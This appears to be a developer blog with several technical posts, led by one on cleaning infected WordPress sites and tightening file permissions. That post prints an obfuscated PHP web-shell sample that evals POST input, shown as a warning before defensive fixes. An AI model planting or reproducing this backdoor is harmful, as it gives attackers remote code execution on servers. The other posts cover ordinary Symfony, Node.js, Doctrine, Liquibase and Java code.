How to avoid infected WordPress files by auditing file permissions?
Problem overview:
It is true that the WordPress engine has security flaws. It is also true that many WordPress plugins are written without security in mind.
Recently I had to restore many WordPress installations after malicious code was executed on the servers (such as sending mail spam via sendmail).
But many hosting providers' server configuration SUCKS! And I will explain why.
First: WordPress can be attacked in many ways. We will cover one of them, related to file permissions and wrong server configuration.
An example of executing malicious code
The most common example is the creation of many fucking infected *.php files (like post_3be78.php) that execute code injected via the $_POST request variable. These files have obfuscated content, so a human eye cannot recognize what they do. Example:
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n6769b6'])) {eval($s21(${$s20}['n6769b6']));}?>
The infected files may contain more cynical content, but you will recognize this crap at first glance.
Server providers SUCK!
That's because they run PHP scripts as the same user that uploaded the files (the FTP user).
Extremely important fact:
If your scripts are executed as the FTP user, you are in trouble.
How to check if your hosting provider sucks?
- Simply create a new directory via FTP. Make sure that it has the default 755 permissions, meaning only the owner of the directory has permission to write new files in it.
- Create a new file test.php with the content below and upload it to that directory:
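A minimal test.php could look like this (the posix_* calls assume the POSIX extension, which most Linux hosts have enabled):
<?php
// 1) Can this script write new files into the directory it lives in?
var_dump(is_writable(__DIR__));
// 2) Which system user is actually executing this script?
$processUser = posix_getpwuid(posix_geteuid());
var_dump($processUser['name']);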
- Show the file's output by accessing it via HTTP:
http://your-site/test/test.php
If the result is bool(true), the script has write access to the directory it exists in. Yes? DAFUQ? Who agreed to this?
The second var_dump returns the user that executes the script. If it is the same as your FTP user, the result is consistent: this user is the owner of the created directory, so it can write any files into it.
What does it mean?
Any script executed on the server has permission to write anywhere in your account. It is a security flaw in the server configuration.
Several years ago the standard was the opposite: you explicitly had to chmod the directories/files where writing should be permitted.
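For example, under that model you keep everything read-only for the web server and open writes only where needed (a sketch; /var/www/site, ftpuser and www-data are example names):
# files owned by the FTP user; the web server can only read them
chown -R ftpuser:ftpuser /var/www/site
chmod -R 755 /var/www/site
# allow writes only where uploads belong (www-data = the PHP user)
chown ftpuser:www-data /var/www/site/wp-content/uploads
chmod 775 /var/www/site/wp-content/uploads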
How to avoid this server configuration security flaw?
- If you are a hosting provider customer: you cannot fix it yourself. You have to ask your administrators whether they can run your PHP scripts as a different user than your FTP user. If they refuse, get the fuck out of your hosting provider and look for another. Wojciech is providing such services.
- If you are the administrator, just set another user to run your PHP scripts.
For Apache, for example:
Edit the file /etc/apache2/envvars (or wherever you have this crap):
export APACHE_RUN_USER=www-data
export APACHE_RUN_GROUP=www-data
For Nginx + php-fpm
Edit your pool configuration:
[your-pool-name]
user = www-data
group = www-data
Temporary fix in .htaccess
Most infected files that execute malicious code are fed via $_POST requests. That is because much more code can be sent in an HTTP POST request payload, while the GET payload size is limited.
You can temporarily disable POST requests to URLs that should not receive them. This will block all new infected files, because you are creating a whitelist, not a blacklist.
An example .htaccess file; it responds with Error 404 to POST requests on URLs other than /wp-login.php and /wp-admin*:
# BEGIN WordPress
RewriteEngine On
RewriteBase /

# POST requests disable
RewriteCond %{REQUEST_METHOD} POST [NC]
RewriteCond %{REQUEST_URI} !^/wp-login.php [NC]
RewriteCond %{REQUEST_URI} !^/wp-admin [NC]
RewriteRule .* - [R=404,L]

RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
That's all. I hope it helped.
Can I do more?
Yes.
Symfony2 Redis Session Handler
Context
When you scale a PHP application, you have to consider several aspects of the runtime environment, such as:
- Bytecode caching (e.g. APC, Zend Optimizer Plus, or eAccelerator), more;
- Reading project files from RAM instead of HDD;
- Caching and minifying static content, etc.
One additional aspect is storing sessions.
By default, PHP stores sessions in files. There are several approaches to speed up session saving, such as memcached or mapping the save_path folder to a ramdisk.
When scaling, it is important that all worker nodes (with the application deployed), whether round-robin selected or load-balanced, run the same code and share the same session storage, because in a distributed architecture there is no guarantee that a user's next request will be handled by the same node. This implies that session memory has to be shared between nodes; unfortunately, storing that data in local RAM doesn't meet this requirement.
Redis as PHP Session Handler
One additional approach to storing sessions in fast memory is Redis, a key-value store. It can be configured as a centralized or distributed database.
There is a Redis session handler available for PHP. To use it:
- install Redis first as a service [more];
- copy/compile the redis.so PHP extension [more information];
- register the extension in the php.ini configuration file;
- reconfigure session.save_handler in your php.ini configuration file, or set it directly at runtime, e.g.:
ini_set('session.save_handler', 'redis');
ini_set('session.save_path', 'tcp://localhost:6379');
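Equivalently, the same two settings can go straight into php.ini (host and port are examples; point them at your Redis instance):
session.save_handler = redis
session.save_path = "tcp://localhost:6379"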
Redis Session Handler in Symfony 2
I am using the Symfony 2 framework. Unfortunately, the 4th step doesn't affect the application. You have to register your own SessionHandler in the config.yml file:
framework:
    session:
        handler_id: session_handler_redis
This configuration uses a new SessionHandler registered as the session_handler_redis Symfony service (more).
We have to write our own SessionHandler for Symfony. I found the Redis SessionHandler proposed by Andrej Hudec on GitHub (original code here) and decided to use and improve the existing implementation.
Declare the new SessionHandler class somewhere in your project:
<?php

namespace Fokus\Webapp\CommonBundle\SessionHandler;

use Symfony\Component\HttpFoundation\Session\Storage\Handler\NativeSessionHandler;

/**
 * NativeRedisSessionHandler.
 *
 * Driver for the redis session save handlers provided by the redis PHP extension.
 *
 * @see https://github.com/nicolasff/phpredis
 *
 * @author Andrej Hudec <pulzarraider@gmail.com>
 * @author Piotr Pelczar <me@athlan.pl>
 */
class NativeRedisSessionHandler extends NativeSessionHandler
{
    /**
     * Constructor.
     *
     * @param string $savePath Path of the redis server.
     */
    public function __construct($savePath = "")
    {
        if (!extension_loaded('redis')) {
            throw new \RuntimeException('PHP does not have "redis" session module registered');
        }

        if ("" === $savePath) {
            $savePath = ini_get('session.save_path');
        }

        if ("" === $savePath) {
            $savePath = "tcp://localhost:6379"; // guess path
        }

        ini_set('session.save_handler', 'redis');
        ini_set('session.save_path', $savePath);
    }
}
Now, add the entry that declares the class as a Symfony service in the services.yml file:
services:
    session_handler_redis:
        class: Fokus\Webapp\CommonBundle\SessionHandler\NativeRedisSessionHandler
        arguments: ["%session_handler_redis_save_path%"]
I improved Andrej's code so that you can configure the session handler through its constructor and pass the Redis connection string directly in Symfony's services configuration, without touching ini_set or php.ini settings. As you can see, the %session_handler_redis_save_path% parameter has been used.
Now, declare the value of the parameter in the parameters.yml file:
session_handler_redis_save_path: tcp://localhost:6379
That’s all!
Just refresh your page, use the session (for example by logging in) and check that it works. Type in the command line:
redis-cli
and show all keys stored by the PHP session handler. Keys begin with the string PHPREDIS_SESSION:.
KEYS PHPREDIS_SESSION*
Example output:
redis 127.0.0.1:6379> KEYS PHPREDIS_SESSION*
1) "PHPREDIS_SESSION:s4uvor0u5dcsq5ncgulqiuef14"
2) "PHPREDIS_SESSION:dcu54je80e6feo5rjqvqpv60h7"
Hope it helped!
Node.js – Load modules from a specified directory recursively
Recently I introduced Node.js and the Express framework into my project, which is very modular.
One of its principles is that each piece of functionality is encapsulated in a Controller, known from web application frameworks such as Spring, Zend, or Symfony. A Controller is nothing more than a function/method that is executed when a client's HTTP request comes in.
It is very convenient to autoload all controllers from a specified directory and register them in the URL routing registry. Assume that all controllers live in the /src/Controller/ directory.
We could use the fs module from the Node.js standard library and call fs.readdir(path) or fs.readdirSync(path), but these methods don't work recursively. There are many ways to walk a directory tree, but I used the existing wrench module written by Ryan McGrath.
The usage of my ModuleLoader:
moduleLoader.loadModulesFromDirectory(path, onLoadCallback)
where onLoadCallback is function(module, moduleName, filePath).
Code
exports.loadModulesFromDirectory = function(dir, onLoadCallback) {
    require('wrench').readdirRecursive(dir, function(error, files) {
        // wrench emits results in batches and signals the end with files === null
        if(null === files)
            return;

        for(var i = 0, j = files.length; i < j; ++i) {
            var file = files[i];

            // load only *.js files
            if(!file.match(/\.js$/))
                continue;

            var moduleName = file.substr(0, file.length - 3);
            var filePath = dir + "/" + file;
            var module = require(filePath);

            onLoadCallback(module, moduleName, filePath);
        }
    });
}
Simple. Let's use this to load our Node.js and Express web application controllers:
1. Create the package.json file:
{
    "name": "hello-world",
    "description": "testapp",
    "dependencies": {
        "express": "3.2.6",
        "wrench": "1.5.1"
    }
}
2. Create the server.js file which will contain our web server:
var express = require('express');
var app = express();
var routes = require('./config/routes');

var port = process.env.port || 3000;

console.log('Starting server at port ' + port);

routes.setup(app);
app.listen(port);
3. Define our ./config/routes.js file:
function setup(app) {
    // assumes ModuleLoader.js is resolvable by require(), e.g. placed in node_modules
    var moduleLoader = require('ModuleLoader');

    var path = __dirname + "/../src/Controller";

    moduleLoader.loadModulesFromDirectory(path, function(module, moduleName, filePath) {
        var loadingState = "";

        if(typeof module.registerAutoload === 'function') {
            module.registerAutoload(app);
            loadingState = "OK";
        }
        else {
            loadingState = "FAILED";
        }

        console.log("Loading Controller >> " + moduleName + " >> from file " + filePath + ": " + loadingState + ".");
    });
}

exports.setup = setup;
4. And the last one… create our test controller in ./src/Controller/Test.js:
var actionHello = function(req, res) {
    res.end('Hello! Server date: ' + new Date());
}

exports.registerAutoload = function(app) {
    app.get('/hello', actionHello);
}
If a controller is not intended to be autoloaded, just don't implement the exports.registerAutoload method. This works like autoloading controllers from a specified package in the Spring Framework, which looks up classes with the @Controller annotation.
5. Now run our app!
To install all dependencies, use npm (Node Packaged Modules):
npm install
After all dependencies are installed, the node_modules directory will be created. Now, just run our app:
node server.js
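If the test controller was picked up, the console should print something like this (the absolute path depends on where the app lives):
Starting server at port 3000
Loading Controller >> Test >> from file /path/to/app/config/../src/Controller/Test.js: OK.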
Now, launch: http://localhost:3000/hello
Pretty, isn’t it?
Hope it helped.
VirtualBox Linux server on Windows
Howdy! Recently I faced the inconvenience of having to develop parts of an application that are friendly to configure on Linux, while installing them on Windows is a nightmare.
What to do when you develop on Windows but need a production environment based on Linux, and you don't want to buy a server? Install Linux locally and run the server on VirtualBox under Windows. The same story concerns the situation when the production server has a lot of shit dependencies you don't want in your development environment, even if it is Linux.
So how to connect to a VirtualBox Linux server from Windows?
- Download VirtualBox and the Linux distribution you want to install (.iso format will be convenient). I have chosen Ubuntu because of its rapid installation.
- Create a new virtual machine for your Linux. More info.
- Mount your .iso and install Linux on VirtualBox. Installation is really user-friendly.
- Now go to the settings of your virtual machine -> network adapter settings -> and change your network adapter type to NAT (note: with plain NAT the host cannot reach the guest directly, so add a port-forwarding rule for SSH, or use a bridged adapter so the VM gets its own address). More info.
- Check that everything is OK, in particular that the network adapter of the virtual machine obtained an IP address. Just type:
/sbin/ifconfig
or:
/sbin/ifconfig | grep addr
Note the assigned IP address.
- Try to ping your virtual machine from the host operating system where VirtualBox is running:
ping virtual_machine_ip_address
- If everything is OK, your machines can reach each other. Now, install the OpenSSH server on your Linux. For Ubuntu:
sudo apt-get install openssh-server
- Now you can open the connection from your host device. On Windows, you can use PuTTY to connect to the virtual machine's command line.
My Ubuntu command line from Windows 8. Locally.
Happy codin'!
ZF2 Translate in Controller
If you want to use the translator in a controller like in a view, just like this:
$this->translate('Hello')
instead of ugly:
$this->getServiceLocator()->get('translator')->translate('Hello')
you have to write your own controller plugin, just like the view helper Zend\I18n\View\Helper\Translate.
Of course, you can invoke the plugin with the same signature:
__invoke($message, $textDomain = null, $locale = null)
To register a new plugin, put these lines in your module.config.php configuration:
'controller_plugins' => array(
    'factories' => array(
        'translate' => 'Application\Controller\Plugin\Translate',
    ),
),
Now, create your own plugin:
<?php

namespace Application\Controller\Plugin;

use Zend\Mvc\Controller\Plugin\AbstractPlugin;
use Zend\ServiceManager\ServiceLocatorInterface;
use Zend\ServiceManager\FactoryInterface;
use Zend\I18n\Translator\Translator;
use Zend\I18n\Translator\TranslatorServiceFactory;

class Translate implements FactoryInterface
{
    public function createService(ServiceLocatorInterface $serviceLocator)
    {
        $serviceLocator = $serviceLocator->getController()->getServiceLocator();

        $serviceFactory = new TranslatorServiceFactory();
        $translator = $serviceFactory->createService($serviceLocator);

        return new TranslatorProxy($translator);
    }
}

final class TranslatorProxy extends AbstractPlugin
{
    private $translator;

    public function __construct(Translator $translator)
    {
        $this->translator = $translator;
    }

    public function __invoke($message, $textDomain = 'default', $locale = null)
    {
        return $this->translator->translate($message, $textDomain, $locale);
    }

    public function __call($method, $args)
    {
        return call_user_func_array([$this->translator, $method], $args);
    }

    public static function __callStatic($method, $args)
    {
        return call_user_func_array([$this->translator, $method], $args);
    }
}
How does it work?
You see, the ServiceLocator passed into the createService(ServiceLocatorInterface $serviceLocator) factory in the controller_plugins configuration space has no access to the Config service from the controller's ServiceLocator. So you cannot fetch the configuration and create the Translator object via TranslatorServiceFactory directly.
Instead, you can access the ServiceLocator assigned to the controller for which our helper has been invoked by calling $serviceLocator->getController().
Of course, the $serviceLocator passed into the createService method is an instance of Zend\Mvc\Controller\PluginManager.
Why a proxy?
The object returned by the plugin factory has to implement Zend\Mvc\Controller\Plugin\PluginInterface, which is abstractly implemented in Zend\Mvc\Controller\Plugin\AbstractPlugin, so we create a proxy object that forwards all calls from our plugin to the Translator object.
Hope it helped!
How to set an ID in Doctrine2 manually
I faced a problem with preserving manually set IDs of records represented by entities whose id uses an auto-generation strategy.
If for some reason you really want to set the ID manually rather than rely on the generation strategy (@GeneratedValue), you have to set:
@GeneratedValue(strategy="NONE")
But if your application relies on automatic identifier creation (@GeneratedValue(strategy="AUTO")) and you exceptionally have to set the ID manually (e.g. for synchronization), you have to change the strategy dynamically by injecting it into the entity's metadata object:
$metadata = $this->entityManager->getClassMetaData(get_class($entity));
$metadata->setIdGenerator(new \Doctrine\ORM\Id\AssignedGenerator());
where $entity is the entity you want to persist and a working entity manager is available under $this->entityManager.
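Putting it together, a minimal sketch (the Article entity and its setId() method are hypothetical, just for illustration; depending on the Doctrine version you may also want to switch the generator type on the metadata):
use Doctrine\ORM\Id\AssignedGenerator;
use Doctrine\ORM\Mapping\ClassMetadata;

$entity = new Article();   // hypothetical entity mapped with @GeneratedValue(strategy="AUTO")
$entity->setId(12345);     // the ID we want to force

$metadata = $this->entityManager->getClassMetaData(get_class($entity));
$metadata->setIdGenerator(new AssignedGenerator());
// some Doctrine versions also consult the generator type, so switch it too:
$metadata->setIdGeneratorType(ClassMetadata::GENERATOR_TYPE_NONE);

$this->entityManager->persist($entity);
$this->entityManager->flush();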
Liquibase: How to store PostgreSQL procedures and triggers
Liquibase is an open source, database-independent library for tracking, managing and applying database changes, written in Java and distributed as a JAR (Java archive). There are many tools for versioning code, the most popular being SVN, Git, and Mercurial.
Many product managers have faced the problem of versioning the database during application development. The solution is Liquibase.
Although the tool is very useful (it can track changes related to tables, views, columns, indexes, and foreign keys), there are a few limitations. One of them is stored procedures, which are database-dependent and which Liquibase cannot track. The solution is to use the custom query execution available in Liquibase.
To create a custom stored procedure in Liquibase, just make a simple XML file (testChanges.xml):
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<databaseChangeLog xmlns="http://www.liquibase.org/xml/ns/dbchangelog"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xsi:schemaLocation="http://www.liquibase.org/xml/ns/dbchangelog http://www.liquibase.org/xml/ns/dbchangelog/dbchangelog-2.0.xsd">
    <preConditions>
        <dbms type="postgresql" />
    </preConditions>

    <changeSet author="Athan (generated)" id="1360329703893-1-1">
        <createProcedure>
            CREATE OR REPLACE FUNCTION TestFunction() RETURNS trigger AS $proc$
            BEGIN
                ...
            END
            $proc$ LANGUAGE plpgsql;
        </createProcedure>
    </changeSet>
</databaseChangeLog>
And type:
liquibase --changeLogFile testChanges.xml --url=jdbc:postgresql://localhost:5432/dbname --username=postgres --password=root update
Your procedure will appear in the database.
WARNING! You should remember that Liquibase provides rollbacks to a version, a tag, or by a count of changes. For custom SQL there are no automatic rollback actions (such as drop table for create table). You have to provide the rollback SQL yourself.
So just add a <rollback> tag to your changeSet:
<rollback>
    DROP FUNCTION TestFunction();
</rollback>
The whole XML should look like:
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<databaseChangeLog xmlns="http://www.liquibase.org/xml/ns/dbchangelog"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xsi:schemaLocation="http://www.liquibase.org/xml/ns/dbchangelog http://www.liquibase.org/xml/ns/dbchangelog/dbchangelog-2.0.xsd">
    <preConditions>
        <dbms type="postgresql" />
    </preConditions>

    <changeSet author="Athan (generated)" id="1360329703893-1-1">
        <createProcedure>
            CREATE OR REPLACE FUNCTION TestFunction() RETURNS trigger AS $proc$
            BEGIN
                ...
            END
            $proc$ LANGUAGE plpgsql;
        </createProcedure>
        <rollback>
            DROP FUNCTION TestFunction();
        </rollback>
    </changeSet>
</databaseChangeLog>
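With the rollback in place, reverting the most recently applied changeSet is one command (rollbackCount is a standard Liquibase command):
liquibase --changeLogFile testChanges.xml --url=jdbc:postgresql://localhost:5432/dbname --username=postgres --password=root rollbackCount 1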
Same case with triggers:
<changeSet author="Athan (generated)" id="1360329703893-2-1">
    <sql>
        CREATE TRIGGER "tableoffersstaterealisedupdate"
        AFTER INSERT OR UPDATE ON "public"."offers"
        FOR EACH ROW
        EXECUTE PROCEDURE "tableoffersstaterealisedupdate"();
    </sql>
    <rollback>
        DROP TRIGGER "tableoffersstaterealisedupdate" ON "public"."offers"
    </rollback>
</changeSet>
Hope this helped you.
Double-checked locking with Singleton pattern in Java
I just faced a problem with synchronizing many threads starting at the same time (with microsecond differences) and creating a single object instance of a database connection using the Singleton pattern in Java. As a result, I had many connections instead of one, and the sent-queries counter ended up smaller than expected in the simulations.
I Googled the IBM article by Peter Haggar, Senior Software Engineer: "Double-checked locking and the Singleton pattern".
Problem overview
Creating a singleton in Java is simple to implement. There are two common ways to do it:
- Lazy initialization: create a private static field _instance filled with null (the default Java object initialization). The instance is created when the static method getInstance() is called.
- Eager initialization: create the class instance in advance, just as the class is loaded into memory, by initializing the private static field _instance with a call to the private constructor: new SingletonClass();
1st implementation with lazy initialization
package pl.athlan.examples.singleton;

public class Singleton {
    private static Singleton _instance; // null by default

    private Singleton() {
    }

    public static Singleton getInstance() {
        if(_instance == null) {
            _instance = new Singleton();
        }

        return _instance;
    }
}
2nd implementation with eager initialization
package pl.athlan.examples.singleton;

public class Singleton {
    private static Singleton _instance = new Singleton(); // object is created just after the class is loaded into memory

    private Singleton() {
    }

    public static Singleton getInstance() {
        return _instance;
    }
}
Motivation
Imagine two separate threads that are delegated to call the getInstance() method at the same time.
| Thread #1 | Thread #2 | value of _instance |
|---|---|---|
| Singleton.getInstance() | | null |
| | Singleton.getInstance() | null |
| if(_instance == null) | | null |
| | if(_instance == null) | null |
| _instance = new Singleton() | | [object #1] |
| | _instance = new Singleton() | [object #2] |
As a result, two objects have been created, because thread #2 hasn't noticed the object created by thread #1.
If your object stores common data, like (in my case) a database queries counter, or if the creation of the object is time-expensive while the system hangs waiting for many threads, this situation must not occur.
Solving the problem
The solution is to synchronize the threads while they access the getInstance method. You could simply write:
public static synchronized Singleton getInstance()
but this solution produces a huge overhead by synchronizing all threads calling this method. The better solution is to synchronize only the fragment of code that checks for existence and actually creates the object, instead of the part returning it when it already exists.
The final solution:
package pl.athlan.examples.singleton;

public class Singleton {
    private volatile static Singleton _instance;

    private Singleton() {
    }

    public static Singleton getInstance() {
        if(_instance == null) {
            // causes this block to be processed sequentially when threads run in parallel
            synchronized(Singleton.class) {
                // if a previous thread created the instance, just omit object creation
                if(_instance == null) {
                    _instance = new Singleton();
                }
            }
        }

        return _instance;
    }
}
The volatile keyword on the _instance field guarantees that writes to it are visible to all threads and prevents publishing a half-constructed object.
If there is no instance of the object yet, the synchronized block begins, which means all threads queue to access that block. After gaining access, a thread checks one more time whether the instance really does not exist, because it cannot know what happened before it reached the queue. If any earlier thread created the object, the creation is simply omitted.
Hope it helped!
NOTE: implementing a Singleton with an ENUM is both thread-safe and reflection-safe.